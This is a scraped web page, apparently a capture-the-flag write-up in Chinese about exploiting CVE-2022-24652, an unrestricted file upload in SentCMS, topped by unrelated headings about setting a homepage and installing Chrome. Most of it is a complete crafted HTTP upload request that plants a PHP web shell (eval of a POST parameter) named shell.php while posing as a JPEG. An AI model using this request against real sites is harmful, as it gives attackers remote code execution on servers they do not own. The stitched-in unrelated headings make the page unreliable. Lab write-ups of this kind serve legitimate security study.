當前位置：首頁 > news >正文

網(wǎng)站設為主頁功能怎么做下載谷歌瀏覽器并安裝

news 2025/7/7 1:14:37

網(wǎng)站設為主頁功能怎么做,下載谷歌瀏覽器并安裝,ubuntu wordpress安裝,ios開發(fā)CVE-2022-24652 開題后臺管理是thinkphp的，但是工具沒檢測出漏洞。登陸后界面如下，上傳頭像功能值得引起注意這其實就是CVE-2022-24652，危險類型文件的不加限制上傳，是文件上傳漏洞。漏洞路由/user/upload/upload 參考文章&a…

CVE-2022-24652

開題

后臺管理是thinkphp的，但是工具沒檢測出漏洞。

登陸后界面如下，上傳頭像功能值得引起注意

這其實就是CVE-2022-24652，危險類型文件的不加限制上傳，是文件上傳漏洞。漏洞路由/user/upload/upload

參考文章：

阿里云漏洞庫 (aliyun.com)

CVE-2022-24652|sentcms 4.0.x allows remote… - VULHUB開源網(wǎng)絡安全威脅庫

Sentcms任意文件上傳漏洞 | Hanayuzu’Blog

抓包上傳文件，由于沒有上傳文件按鈕，我們手動構(gòu)建上傳包。

修改包：

POST /user/upload/upload HTTP/1.1
Host: 7dd1d89b-bc28-43fc-9b42-a014dff41eea.vnctf2024.manqiu.top
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=bdd5af1e5c92e47342e53886cecaced2
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Length: 770------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; name="id"WU_FILE_0
------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; name="name"test.jpg
------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; name="type"image/jpeg
------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; name="lastModifiedDate"Wed Jul 21 2021 18:15:25 GMT+0800 (中國標準時間)
------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; name="size"164264
------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; name="file"; filename="shell.php"
Content-Type: image/jpegJay17
<?php eval($_POST[1]);?>------WebKitFormBoundaryrhx2kYAMYDqoTThz--